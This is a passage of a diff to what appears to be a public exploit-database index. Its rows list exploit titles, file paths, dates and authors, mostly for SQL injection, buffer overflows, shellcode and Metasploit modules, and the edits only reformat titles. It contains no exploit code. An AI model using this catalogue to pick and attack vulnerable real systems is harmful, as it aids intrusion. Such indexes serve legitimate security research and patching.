Multiple XSS Vulnerabilities",2010-11-29,"High-Tech Bridge SA",php,webapps,0 -15635,platforms/windows/dos/15635.py,"Provj 5.1.5.5 (m3u) Buffer Overflow PoC",2010-11-30,0v3r,windows,dos,0 +15635,platforms/windows/dos/15635.py,"Provj 5.1.5.5 - (m3u) Buffer Overflow PoC",2010-11-30,0v3r,windows,dos,0 15636,platforms/php/webapps/15636.txt,"Orbis CMS 1.0.2 - Arbitrary File Upload",2010-11-30,"Mark Stanislav",php,webapps,0 15637,platforms/php/webapps/15637.txt,"Link Protect 1.2 Persistent XSS Vulnerabilities",2010-11-30,"Shichemt Alen",php,webapps,0 15638,platforms/php/webapps/15638.txt,"Duhok Forum <= 1.1 - Remote File Upload",2010-11-30,BrOx-Dz,php,webapps,0 @@ -13594,7 +13594,7 @@ id,file,description,date,author,platform,type,port 15658,platforms/windows/remote/15658.rb,"Image Viewer CP Gold 5.5 - Image2PDF() Buffer Overflow (Metasploit)",2010-12-02,bz1p,windows,remote,0 15659,platforms/php/webapps/15659.txt,"Contenido CMS 4.8.12 - XSS Vulnerabilities",2010-12-02,"High-Tech Bridge SA",php,webapps,0 15660,platforms/php/webapps/15660.txt,"etomite 1.1 - Multiple Vulnerabilities",2010-12-02,"High-Tech Bridge SA",php,webapps,0 -15661,platforms/asp/webapps/15661.txt,"Ananda Real Estate 3.4 (list.asp) Multiple SQL Injection",2010-12-02,underground-stockholm.com,asp,webapps,0 +15661,platforms/asp/webapps/15661.txt,"Ananda Real Estate 3.4 - (list.asp) Multiple SQL Injection",2010-12-02,underground-stockholm.com,asp,webapps,0 15662,platforms/linux/remote/15662.txt,"ProFTPD 1.3.3c - Compromised Source Remote Root Trojan",2010-12-02,anonymous,linux,remote,21 15663,platforms/windows/local/15663.py,"MediaCoder <= 0.7.5.4797 - (.m3u) Buffer Overflow (SEH)",2010-12-02,"Oh Yaw Theng",windows,local,0 15664,platforms/ios/remote/15664.txt,"iOS iFTPStorage <= 1.3 - Directory Traversal",2010-12-03,XEL,ios,remote,0 @@ -13736,7 +13736,7 @@ id,file,description,date,author,platform,type,port 15816,platforms/php/webapps/15816.txt,"CubeCart <= 3.0.4 - SQL Injection",2010-12-23,Dr.NeT,php,webapps,0 15818,platforms/php/webapps/15818.txt,"iDevSpot iDevCart 1.10 - Multiple Local File Inclusion Vulnerabilities",2010-12-24,v3n0m,php,webapps,0 15819,platforms/php/webapps/15819.txt,"Joomla Component com_xmovie 1.0 - Local File Inclusion",2010-12-24,KelvinX,php,webapps,0 -15820,platforms/php/webapps/15820.txt,"SquareCMS 0.3.1 (post.php) SQL Injection",2010-12-24,cOndemned,php,webapps,0 +15820,platforms/php/webapps/15820.txt,"SquareCMS 0.3.1 - (post.php) SQL Injection",2010-12-24,cOndemned,php,webapps,0 15821,platforms/windows/dos/15821.py,"HttpBlitz Web Server Denial of Service Exploit",2010-12-24,otoy,windows,dos,0 15822,platforms/php/webapps/15822.html,"CubeCart 3.0.6 - CSRF (Add Admin)",2010-12-24,"P0C T34M",php,webapps,0 15824,platforms/php/webapps/15824.txt,"Pligg 1.1.2 - Blind SQL Injection and XSS Vulnerabilities",2010-12-25,"Michael Brooks",php,webapps,0 @@ -13745,7 +13745,7 @@ id,file,description,date,author,platform,type,port 15827,platforms/php/webapps/15827.txt,"Joomla Component (com_idoblog) SQL Injection",2010-12-25,NOCKAR1111,php,webapps,0 15828,platforms/php/webapps/15828.txt,"Vacation Rental Script 4.0 - CSRF",2010-12-25,OnurTURKESHAN,php,webapps,0 15838,platforms/php/webapps/15838.php,"OpenClassifieds 1.7.0.3 - Chained: Captcha Bypass / SQLi / Persistent XSS on Frontpage",2010-12-28,"Michael Brooks",php,webapps,0 -15830,platforms/php/webapps/15830.txt,"Social Engine 4.x (Music Plugin) Arbitrary File Upload",2010-12-25,MyDoom,php,webapps,0 +15830,platforms/php/webapps/15830.txt,"Social Engine 4.x - (Music Plugin) Arbitrary File Upload",2010-12-25,MyDoom,php,webapps,0 15831,platforms/php/webapps/15831.txt,"LoveCMS 1.6.2 Final Multiple Local File Inclusion Vulnerabilities",2010-12-25,cOndemned,php,webapps,0 15832,platforms/php/webapps/15832.txt,"Interact 2.4.1 - SQL Injection",2010-12-26,"IR Security",php,webapps,0 15834,platforms/windows/remote/15834.py,"Kolibri 2.0 - Buffer Overflow RET + SEH Exploit (HEAD)",2010-12-26,TheLeader,windows,remote,0 @@ -13763,7 +13763,7 @@ id,file,description,date,author,platform,type,port 15849,platforms/php/webapps/15849.txt,"LoveCMS 1.6.2 - CSRF Code Injection",2010-12-29,hiphop,php,webapps,0 15850,platforms/php/webapps/15850.html,"PiXie CMS <= 1.04 - Multiple CSRF Vulnerabilities",2010-12-29,"Ali Raheem",php,webapps,0 15851,platforms/windows/dos/15851.py,"QuickTime Picture Viewer 7.6.6 JP2000 - Denial of Service",2010-12-29,BraniX,windows,dos,0 -15852,platforms/php/webapps/15852.txt,"Siteframe 3.2.3 (user.php) SQL Injection",2010-12-29,"AnGrY BoY",php,webapps,0 +15852,platforms/php/webapps/15852.txt,"Siteframe 3.2.3 - (user.php) SQL Injection",2010-12-29,"AnGrY BoY",php,webapps,0 15853,platforms/php/webapps/15853.txt,"DGNews 2.1 - SQL Injection",2010-12-29,kalashnikov,php,webapps,0 15856,platforms/php/webapps/15856.php,"TYPO3 Unauthenticated Arbitrary File Retrieval",2010-12-29,ikki,php,webapps,0 15855,platforms/windows/local/15855.py,"Digital Music Pad 8.2.3.4.8 - (.pls) SEH Overflow",2010-12-29,"Abhishek Lyall",windows,local,0 @@ -13773,7 +13773,7 @@ id,file,description,date,author,platform,type,port 15861,platforms/windows/remote/15861.txt,"httpdasm 0.92 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0 15862,platforms/windows/remote/15862.txt,"quickphp Web server 1.9.1 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0 15863,platforms/php/webapps/15863.txt,"lightneasy 3.2.2 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0 -15864,platforms/php/webapps/15864.txt,"Ignition 1.3 (page.php) Local File Inclusion",2010-12-30,cOndemned,php,webapps,0 +15864,platforms/php/webapps/15864.txt,"Ignition 1.3 - (page.php) Local File Inclusion",2010-12-30,cOndemned,php,webapps,0 15865,platforms/php/webapps/15865.php,"Ignition 1.3 - Remote Code Execution Exploit",2010-12-30,cOndemned,php,webapps,0 15866,platforms/windows/remote/15866.html,"Chilkat Software FTP2 - ActiveX Component Remote Code Execution",2010-12-30,rgod,windows,remote,0 15915,platforms/php/webapps/15915.py,"Concrete CMS 5.4.1.1 - XSS/Remote Code Execution Exploit",2011-01-05,mr_me,php,webapps,0 @@ -13835,7 +13835,7 @@ id,file,description,date,author,platform,type,port 15968,platforms/php/webapps/15968.txt,"vam shop 1.6 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps,0 15969,platforms/php/webapps/15969.txt,"diafan.cms 4.3 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps,0 15970,platforms/php/webapps/15970.txt,"Cambio 0.5a CSRF Vulnerabiliity",2011-01-11,"High-Tech Bridge SA",php,webapps,0 -15966,platforms/php/webapps/15966.txt,"ExtCalendar 2 (calendar.php) SQL Injection",2011-01-11,"Lagripe-Dz and Mca-Crb",php,webapps,0 +15966,platforms/php/webapps/15966.txt,"ExtCalendar 2 - (calendar.php) SQL Injection",2011-01-11,"Lagripe-Dz and Mca-Crb",php,webapps,0 15967,platforms/php/webapps/15967.txt,"energine 2.3.8 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps,0 15971,platforms/php/webapps/15971.txt,"whCMS 0.115 - CSRF",2011-01-11,"High-Tech Bridge SA",php,webapps,0 15972,platforms/windows/local/15972.c,"DriveCrypt <= 5.3 - Local Kernel ring0 SYSTEM Exploit",2011-01-11,mu-b,windows,local,0 @@ -13859,20 +13859,20 @@ id,file,description,date,author,platform,type,port 15996,platforms/php/webapps/15996.txt,"compactcms 1.4.1 - Multiple Vulnerabilities",2011-01-15,NLSecurity,php,webapps,0 15997,platforms/jsp/webapps/15997.py,"MeshCMS 3.5 - Remote Code Execution Exploit",2011-01-16,mr_me,jsp,webapps,0 15998,platforms/windows/dos/15998.txt,"Kingsoft AntiVirus 2011 SP5.2 KisKrnl.sys <= 2011.1.13.89 - Local Kernel Mode DoS Exploit",2011-01-16,MJ0011,windows,dos,0 -15999,platforms/php/webapps/15999.txt,"BetMore Site Suite 4 (bid) Blind SQL Injection",2011-01-16,"BorN To K!LL",php,webapps,0 +15999,platforms/php/webapps/15999.txt,"BetMore Site Suite 4 - (bid) Blind SQL Injection",2011-01-16,"BorN To K!LL",php,webapps,0 16002,platforms/windows/dos/16002.html,"ActiveX UserManager 2.03 - Buffer Overflow",2011-01-16,blake,windows,dos,0 16000,platforms/php/webapps/16000.txt,"Seo Panel 2.2.0 - Cookie-Rendered Persistent XSS",2011-01-16,"Mark Stanislav",php,webapps,0 16001,platforms/php/webapps/16001.txt,"People Joomla Component 1.0.0 - Local File Inclusion",2011-01-16,"ALTBTA ",php,webapps,0 -16003,platforms/php/webapps/16003.txt,"AWBS 2.9.2 (cart.php) Blind SQL Injection",2011-01-16,ShivX,php,webapps,0 +16003,platforms/php/webapps/16003.txt,"AWBS 2.9.2 - (cart.php) Blind SQL Injection",2011-01-16,ShivX,php,webapps,0 16004,platforms/php/webapps/16004.txt,"PHP-Fusion Teams Structure Infusion Addon SQL Injection",2011-01-17,Saif,php,webapps,0 16006,platforms/cgi/webapps/16006.html,"SmoothWall Express 3.0 - Multiple Vulnerabilities",2011-01-17,"dave b",cgi,webapps,0 16009,platforms/windows/local/16009.pl,"A-PDF All to MP3 Converter 2.0.0 - (.wav) Buffer Overflow Exploit",2011-01-18,h1ch4m,windows,local,0 16010,platforms/php/webapps/16010.txt,"allCineVid Joomla Component 1.0.0 - Blind SQL Injection",2011-01-18,"Salvatore Fresta",php,webapps,0 -16011,platforms/php/webapps/16011.txt,"CakePHP <= 1.3.5 / 1.2.8 unserialize()",2011-01-18,felix,php,webapps,0 +16011,platforms/php/webapps/16011.txt,"CakePHP <= 1.3.5 - / 1.2.8 unserialize()",2011-01-18,felix,php,webapps,0 16013,platforms/php/webapps/16013.html,"N-13 News 3.4 - Remote Admin Add CSRF Exploit",2011-01-18,anT!-Tr0J4n,php,webapps,0 16014,platforms/windows/remote/16014.html,"Novell iPrint <= 5.52 - ActiveX GetDriverSettings() Remote Exploit (ZDI-10-256)",2011-01-19,Dr_IDE,windows,remote,0 17209,platforms/php/webapps/17209.txt,"SoftMP3 SQL Injection",2011-04-24,mArTi,php,webapps,0 -17210,platforms/windows/local/17210.rb,"eZip Wizard 3.0 - Stack Buffer Overflow",2011-04-25,metasploit,windows,local,0 +17210,platforms/windows/local/17210.rb,"eZip Wizard 3.0 - Stack Buffer Overflow",2011-04-25,Metasploit,windows,local,0 16016,platforms/php/webapps/16016.txt,"Simploo CMS 1.7.1 PHP Code Execution",2011-01-19,"David Vieira-Kurz",php,webapps,0 16039,platforms/php/webapps/16039.txt,"Joomla B2 Portfolio Component 1.0.0 - Multiple SQL Injection",2011-01-24,"Salvatore Fresta",php,webapps,0 16018,platforms/php/webapps/16018.txt,"PHP auctions (viewfaqs.php) Blind SQL Injection",2011-01-19,"BorN To K!LL",php,webapps,0 @@ -13926,7 +13926,7 @@ id,file,description,date,author,platform,type,port 16083,platforms/windows/local/16083.rb,"NetZip Classic Buffer Overflow Exploit (SEH)",2011-01-30,"C4SS!0 G0M3S",windows,local,0 16084,platforms/windows/dos/16084.html,"Maxthon Browser 3.0.20.1000 - ref / replace DoS",2011-01-30,"Carlos Mario Penagos Hollmann",windows,dos,0 16272,platforms/php/webapps/16272.txt,"Limelight Software (article.php) SQL Injection",2011-03-04,eXeSoul,php,webapps,0 -16085,platforms/windows/local/16085.py,"AOL 9.5 (rtx) Local Buffer Overflow Exploit",2011-01-31,sup3r,windows,local,0 +16085,platforms/windows/local/16085.py,"AOL 9.5 - (rtx) Local Buffer Overflow Exploit",2011-01-31,sup3r,windows,local,0 16086,platforms/linux/local/16086.txt,"OpenVAS Manager Command Injection",2011-01-31,"Tim Brown",linux,local,0 16088,platforms/php/webapps/16088.php,"NetLink Arbitrary File Upload",2011-02-01,lumut--,php,webapps,0 16090,platforms/php/webapps/16090.txt,"TinyWebGallery 1.8.3 - Multiple Vulnerabilities",2011-02-01,"Yam Mesicka",php,webapps,0 @@ -13959,7 +13959,7 @@ id,file,description,date,author,platform,type,port 16127,platforms/php/webapps/16127.txt,"T-Content Managment System - Multiple Vulnerabilities",2011-02-07,"Daniel Godoy",php,webapps,0 16128,platforms/php/webapps/16128.txt,"jakcms 2.0 pro rc5 - Stored XSS via useragent http header injection",2011-02-07,"Saif El-Sherei",php,webapps,0 16129,platforms/linux/dos/16129.txt,"ProFTPD mod_sftp - Integer Overflow DoS PoC",2011-02-07,kingcope,linux,dos,0 -16130,platforms/php/webapps/16130.txt,"MyMarket 1.71 (index.php) SQL Injection",2011-02-07,ahmadso,php,webapps,0 +16130,platforms/php/webapps/16130.txt,"MyMarket 1.71 - (index.php) SQL Injection",2011-02-07,ahmadso,php,webapps,0 16131,platforms/php/webapps/16131.txt,"SWFUpload 2.5.0 Beta 3 - File Arbitrary Upload",2011-02-07,"Daniel Godoy",php,webapps,0 16132,platforms/windows/local/16132.htm,"AoA DVD Creator 2.5 - ActiveX Stack Overflow Exploit",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0 16133,platforms/windows/local/16133.htm,"AoA Mp4 converter 4.1.0 - ActiveX Stack Overflow Exploit",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0 @@ -13976,12 +13976,12 @@ id,file,description,date,author,platform,type,port 16143,platforms/php/webapps/16143.txt,"MihanTools Script 1.3.3 - SQL Injection",2011-02-09,WHITE_DEVIL,php,webapps,0 16144,platforms/php/webapps/16144.txt,"Enable Media Replace WordPress Plugin - Multiple Vulnerabilities",2011-02-09,"Ulf Harnhammar",php,webapps,0 16145,platforms/windows/remote/16145.pl,"Unreal Tournament - Remote Buffer Overflow Exploit (SEH)",2011-02-09,Fulcrum,windows,remote,0 -16183,platforms/php/webapps/16183.txt,"GAzie 5.10 (Login parameter) Multiple Vulnerabilities",2011-02-17,LiquidWorm,php,webapps,0 +16183,platforms/php/webapps/16183.txt,"GAzie 5.10 - (Login parameter) Multiple Vulnerabilities",2011-02-17,LiquidWorm,php,webapps,0 16165,platforms/php/webapps/16165.txt,"AWCM 2.2 Final - Persistent Cross-Site Script",2011-02-14,_84kur10_,php,webapps,0 16166,platforms/windows/dos/16166.py,"Microsoft Windows 2003 - AD Pre-Auth BROWSER ELECTION Remote Heap Overflow",2011-02-14,Cupidon-3005,windows,dos,0 16148,platforms/php/webapps/16148.txt,"SourceBans 1.4.7 - XSS",2011-02-09,Sw1tCh,php,webapps,0 16149,platforms/hardware/remote/16149.txt,"Linksys WAP610N Unauthenticated Root Access Security",2011-02-10,"Matteo Ignaccolo",hardware,remote,0 -16150,platforms/windows/dos/16150.py,"XM Easy Personal FTP Server 5.8.0 (TYPE) Denial of Service",2011-02-10,"Houssam Sahli",windows,dos,0 +16150,platforms/windows/dos/16150.py,"XM Easy Personal FTP Server 5.8.0 - (TYPE) Denial of Service",2011-02-10,"Houssam Sahli",windows,dos,0 16152,platforms/multiple/webapps/16152.py,"LocatePC 1.05 (Ligatt Version + Others) - Trivial SQL Injection",2011-02-10,anonymous,multiple,webapps,0 16153,platforms/windows/local/16153.py,"MoviePlay 4.82 - (.lst) Buffer Overflow",2011-02-11,sickness,windows,local,0 16154,platforms/php/webapps/16154.txt,"Horde Horde_Image::factory driver Argument Local File Inclusion",2011-02-11,skysbsb,php,webapps,0 @@ -14084,650 +14084,650 @@ id,file,description,date,author,platform,type,port 16280,platforms/php/webapps/16280.py,"Vtiger CRM 5.0.4 Pre-Auth Local File Inclusion Exploit",2011-03-05,TecR0c,php,webapps,0 16281,platforms/php/webapps/16281.txt,"BoutikOne (description.php) SQL Injection",2011-03-05,IRAQ_JAGUAR,php,webapps,0 16283,platforms/win_x86/shellcode/16283.txt,"Win32 - eggsearch shellcode (33 bytes)",2011-03-05,oxff,win_x86,shellcode,0 -16284,platforms/unix/dos/16284.rb,"Subversion Date Svnserve",2010-08-07,metasploit,unix,dos,0 -16285,platforms/linux/remote/16285.rb,"NTP daemon readvar Buffer Overflow",2010-08-25,metasploit,linux,remote,0 -16286,platforms/multiple/remote/16286.rb,"RealServer Describe Buffer Overflow",2010-08-07,metasploit,multiple,remote,0 -16287,platforms/multiple/remote/16287.rb,"Wyse Rapport Hagent Fake Hserver Command Execution",2010-11-11,metasploit,multiple,remote,0 -16288,platforms/multiple/remote/16288.rb,"Generic Payload Handler",2011-02-28,metasploit,multiple,remote,0 -16289,platforms/linux/remote/16289.rb,"Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow",2010-02-11,metasploit,linux,remote,0 -16290,platforms/multiple/remote/16290.rb,"VERITAS NetBackup Remote Command Execution",2010-10-09,metasploit,multiple,remote,0 -16291,platforms/multiple/remote/16291.rb,"HP OpenView OmniBack II Command Execution",2010-09-20,metasploit,multiple,remote,0 -16292,platforms/multiple/remote/16292.rb,"Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)",2010-11-24,metasploit,multiple,remote,0 -16293,platforms/multiple/remote/16293.rb,"Sun Java Calendar Deserialization Exploit",2010-09-20,metasploit,multiple,remote,0 -16294,platforms/multiple/remote/16294.rb,"Sun Java JRE getSoundbank file:// URI Buffer Overflow",2010-09-20,metasploit,multiple,remote,0 -16295,platforms/multiple/remote/16295.rb,"Apple QTJava toQTPointer() Arbitrary Memory Access",2010-09-20,metasploit,multiple,remote,0 -16296,platforms/osx/remote/16296.rb,"Apple OS X iTunes 8.1.1 ITms Overflow",2010-11-11,metasploit,osx,remote,0 -16297,platforms/multiple/remote/16297.rb,"Java Statement.invoke() Trusted Method Chain Exploit",2010-12-15,metasploit,multiple,remote,0 -16298,platforms/multiple/remote/16298.rb,"Sun Java JRE AWT setDiffICM Buffer Overflow",2010-09-20,metasploit,multiple,remote,0 -16299,platforms/multiple/remote/16299.rb,"Firefox 3.5 - escape() Return Value Memory Corruption",2010-09-20,metasploit,multiple,remote,0 -16300,platforms/multiple/remote/16300.rb,"Mozilla Suite/Firefox Navigator Object Code Execution",2010-09-20,metasploit,multiple,remote,0 -16301,platforms/multiple/remote/16301.rb,"Firefox location.QueryInterface() Code Execution",2010-09-20,metasploit,multiple,remote,0 -16302,platforms/multiple/remote/16302.rb,"Signed Applet Social Engineering - Code Execuction",2011-01-08,metasploit,multiple,remote,0 -16303,platforms/multiple/remote/16303.rb,"Opera 9 Configuration Overwrite",2010-07-27,metasploit,multiple,remote,0 -16304,platforms/multiple/remote/16304.rb,"Opera historysearch XSS",2010-11-11,metasploit,multiple,remote,0 -16305,platforms/multiple/remote/16305.rb,"Java RMIConnectionImpl Deserialization Privilege Escalation Exploit",2010-09-27,metasploit,multiple,remote,0 -16306,platforms/windows/remote/16306.rb,"Mozilla Suite/Firefox InstallVersion->compareTo() - Code Execution",2010-09-20,metasploit,windows,remote,0 -16307,platforms/multiple/local/16307.rb,"PeaZip <= 2.6.1 Zip Processing Command Injection",2010-09-20,metasploit,multiple,local,0 -16308,platforms/multiple/remote/16308.rb,"Maple Maplet File Creation and Command Execution",2010-09-20,metasploit,multiple,remote,0 -16309,platforms/multiple/remote/16309.rb,"Adobe U3D CLODProgressiveMeshDeclaration Array Overrun (1)",2010-09-20,metasploit,multiple,remote,0 -16310,platforms/multiple/remote/16310.rb,"PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)",2010-09-20,metasploit,multiple,remote,0 -16311,platforms/linux/remote/16311.rb,"wu-ftpd - SITE EXEC/INDEX Format String",2010-11-30,metasploit,linux,remote,0 -16312,platforms/multiple/remote/16312.rb,"Axis2 - Authenticated Code Execution (via REST)",2010-12-14,metasploit,multiple,remote,0 -16313,platforms/php/webapps/16313.rb,"FreeNAS exec_raw.php Arbitrary Command Execution",2010-11-24,metasploit,php,webapps,0 -16314,platforms/multiple/remote/16314.rb,"Sun Java System Web Server WebDAV OPTIONS Buffer Overflow",2010-08-07,metasploit,multiple,remote,0 -16315,platforms/multiple/remote/16315.rb,"Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP)",2010-12-14,metasploit,multiple,remote,0 -16316,platforms/multiple/remote/16316.rb,"JBoss Java Class DeploymentFileRepository WAR deployment",2010-08-03,metasploit,multiple,remote,0 -16317,platforms/multiple/remote/16317.rb,"Apache Tomcat Manager Application Deployer Authenticated Code Execution",2010-12-14,metasploit,multiple,remote,0 -16318,platforms/multiple/remote/16318.rb,"JBoss JMX Console Deployer Upload and Execute",2010-10-19,metasploit,multiple,remote,0 -16319,platforms/multiple/remote/16319.rb,"JBoss JMX Console Beanshell Deployer WAR upload and deployment",2011-01-10,metasploit,multiple,remote,0 -16320,platforms/unix/remote/16320.rb,"Samba 'username map script' Command Execution",2010-08-18,metasploit,unix,remote,0 -16321,platforms/linux/remote/16321.rb,"Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow",2010-04-28,metasploit,linux,remote,0 -16322,platforms/solaris/remote/16322.rb,"Solaris LPD Command Execution",2010-09-20,metasploit,solaris,remote,0 -16323,platforms/solaris_sparc/remote/16323.rb,"Solaris dtspcd Heap Overflow",2010-04-30,metasploit,solaris_sparc,remote,0 -16324,platforms/multiple/remote/16324.rb,"Solaris sadmind Command Execution",2010-06-22,metasploit,multiple,remote,0 -16325,platforms/solaris/remote/16325.rb,"Sun Solaris sadmind adm_build_path() Buffer Overflow",2010-07-03,metasploit,solaris,remote,0 -16326,platforms/solaris/remote/16326.rb,"Solaris ypupdated Command Execution",2010-07-25,metasploit,solaris,remote,0 -16327,platforms/solaris/remote/16327.rb,"Solaris in.telnetd TTYPROMPT Buffer Overflow",2010-06-22,metasploit,solaris,remote,0 -16328,platforms/solaris/remote/16328.rb,"Sun Solaris Telnet Remote Authentication Bypass",2010-06-22,metasploit,solaris,remote,0 -16329,platforms/solaris/remote/16329.rb,"Samba lsa_io_trans_names Heap Overflow (Solaris)",2010-04-05,metasploit,solaris,remote,0 -16330,platforms/solaris_sparc/remote/16330.rb,"Samba - trans2open Overflow (Solaris SPARC)",2010-06-21,metasploit,solaris_sparc,remote,0 -16331,platforms/windows/remote/16331.rb,"Veritas Backup Exec Name Service Overflow",2010-06-22,metasploit,windows,remote,0 -16332,platforms/windows/remote/16332.rb,"Veritas Backup Exec Windows Remote Agent Overflow",2010-07-03,metasploit,windows,remote,0 -16333,platforms/windows/remote/16333.rb,"Windows Media Services ConnectFunnel Stack Buffer Overflow",2010-04-28,metasploit,windows,remote,0 -16334,platforms/windows/remote/16334.rb,"Microsoft Private Communications Transport - Overflow",2010-09-20,metasploit,windows,remote,0 -16335,platforms/windows/remote/16335.rb,"WinComLPD <= 3.0.2 - Buffer Overflow",2010-06-22,metasploit,windows,remote,0 -16336,platforms/windows/remote/16336.rb,"NIPrint LPD Request Overflow",2010-12-25,metasploit,windows,remote,0 -16337,platforms/windows/remote/16337.rb,"Hummingbird Connectivity 10 SP5 LPD Buffer Overflow",2010-09-20,metasploit,windows,remote,0 -16338,platforms/windows/remote/16338.rb,"SAP SAPLPD 6.28 - Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16339,platforms/windows/remote/16339.rb,"Timbuktu Pro Directory Traversal/File Upload",2010-11-24,metasploit,windows,remote,0 -16340,platforms/windows/remote/16340.rb,"Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow",2010-11-24,metasploit,windows,remote,0 -16341,platforms/windows/remote/16341.rb,"Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow",2010-11-24,metasploit,windows,remote,0 -16342,platforms/windows/remote/16342.rb,"Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow",2010-11-24,metasploit,windows,remote,0 -16343,platforms/windows/remote/16343.rb,"Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16344,platforms/windows/remote/16344.rb,"FutureSoft TFTP Server 2000 - Transfer-Mode Overflow",2010-05-09,metasploit,windows,remote,0 -16345,platforms/windows/remote/16345.rb,"D-Link TFTP 1.0 - Long Filename Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16346,platforms/windows/remote/16346.rb,"TFTPDWIN 0.4.2 - Long Filename Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16347,platforms/windows/remote/16347.rb,"3CTftpSvc TFTP - Long Mode Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16348,platforms/windows/remote/16348.rb,"Quick FTP Pro 2.1 Transfer-Mode Overflow",2010-06-15,metasploit,windows,remote,0 -16349,platforms/windows/remote/16349.rb,"TFTPD32 <= 2.21 - Long Filename Buffer Overflow",2010-09-20,metasploit,windows,remote,0 -16350,platforms/windows/remote/16350.rb,"Allied Telesyn TFTP Server 1.9 - Long Filename Overflow",2011-03-05,metasploit,windows,remote,0 -16351,platforms/windows/remote/16351.rb,"SIPfoundry sipXezPhone 0.35a CSeq Field Overflow",2010-06-15,metasploit,windows,remote,0 -16352,platforms/windows/remote/16352.rb,"SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow",2010-06-15,metasploit,windows,remote,0 -16353,platforms/windows/remote/16353.rb,"AIM Triton 1.0.4 CSeq Buffer Overflow",2010-06-15,metasploit,windows,remote,0 -16354,platforms/windows/remote/16354.rb,"Microsoft IIS ISAPI w3who.dll Query String Overflow",2010-07-07,metasploit,windows,remote,0 -16355,platforms/windows/remote/16355.rb,"Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow",2010-07-25,metasploit,windows,remote,0 -16356,platforms/windows/remote/16356.rb,"Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow",2010-07-25,metasploit,windows,remote,0 -16357,platforms/windows/remote/16357.rb,"Microsoft IIS Phone Book Service Overflow",2010-04-30,metasploit,windows,remote,0 -16358,platforms/windows/remote/16358.rb,"Microsoft IIS ISAPI RSA WebAgent Redirect Overflow",2010-09-20,metasploit,windows,remote,0 -16359,platforms/windows/remote/16359.rb,"Microsoft WINS Service Memory Overwrite",2010-09-20,metasploit,windows,remote,0 -16360,platforms/windows/remote/16360.rb,"Microsoft Windows SMB Relay Code Execution",2010-09-21,metasploit,windows,remote,0 -16361,platforms/windows/remote/16361.rb,"Microsoft Windows - Print Spooler Service Impersonation (MS10-061)",2011-02-17,metasploit,windows,remote,0 -16362,platforms/windows/remote/16362.rb,"Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067)",2011-01-21,metasploit,windows,remote,0 -16363,platforms/windows/remote/16363.rb,"Microsoft Windows SRV2.SYS SMB Negotiate ProcessID Function Table Dereference",2010-07-03,metasploit,windows,remote,0 -16364,platforms/windows/remote/16364.rb,"Microsoft RRAS Service Overflow",2010-05-09,metasploit,windows,remote,0 -16365,platforms/windows/dos/16365.rb,"Microsoft Plug and Play Service Overflow",2010-08-30,metasploit,windows,dos,0 -16366,platforms/windows/remote/16366.rb,"Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)",2010-09-28,metasploit,windows,remote,0 -16367,platforms/windows/remote/16367.rb,"Microsoft Server Service NetpwPathCanonicalize Overflow",2011-02-17,metasploit,windows,remote,0 -16368,platforms/windows/remote/16368.rb,"Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow",2010-07-03,metasploit,windows,remote,0 -16369,platforms/windows/remote/16369.rb,"Microsoft Services - nwwks.dll (MS06-066)",2010-05-09,metasploit,windows,remote,0 -16370,platforms/windows/remote/16370.rb,"Timbuktu <= 8.6.6 PlughNTCommand Named Pipe Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16371,platforms/windows/remote/16371.rb,"Microsoft NetDDE Service Overflow",2010-07-03,metasploit,windows,remote,0 -16372,platforms/windows/remote/16372.rb,"Microsoft Workstation Service NetpManageIPCConnect Overflow",2010-10-05,metasploit,windows,remote,0 -16373,platforms/windows/remote/16373.rb,"Microsoft Services - nwapi32.dll (MS06-066)",2010-08-25,metasploit,windows,remote,0 -16374,platforms/windows/remote/16374.rb,"Microsoft Windows Authenticated User Code Execution",2010-12-02,metasploit,windows,remote,0 -16375,platforms/windows/remote/16375.rb,"Microsoft RRAS Service RASMAN Registry Overflow",2010-08-25,metasploit,windows,remote,0 -16376,platforms/windows/remote/16376.rb,"Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow",2010-11-24,metasploit,windows,remote,0 -16377,platforms/windows/remote/16377.rb,"Microsoft ASN.1 Library Bitstring Heap Overflow",2010-07-25,metasploit,windows,remote,0 -16378,platforms/windows/remote/16378.rb,"Microsoft Workstation Service NetAddAlternateComputerName Overflow",2010-05-09,metasploit,windows,remote,0 -16379,platforms/windows/remote/16379.rb,"Microsoft Outlook Express NNTP Response Parsing Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16380,platforms/windows/remote/16380.rb,"CitectSCADA/CitectFacilities ODBC Buffer Overflow",2010-11-14,metasploit,windows,remote,0 -16381,platforms/windows/remote/16381.rb,"MOXA Device Manager Tool 2.1 - Buffer Overflow",2010-11-14,metasploit,windows,remote,0 -16382,platforms/windows/remote/16382.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE Buffer Overflow",2010-11-30,metasploit,windows,remote,0 -16383,platforms/windows/remote/16383.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE_RF Buffer 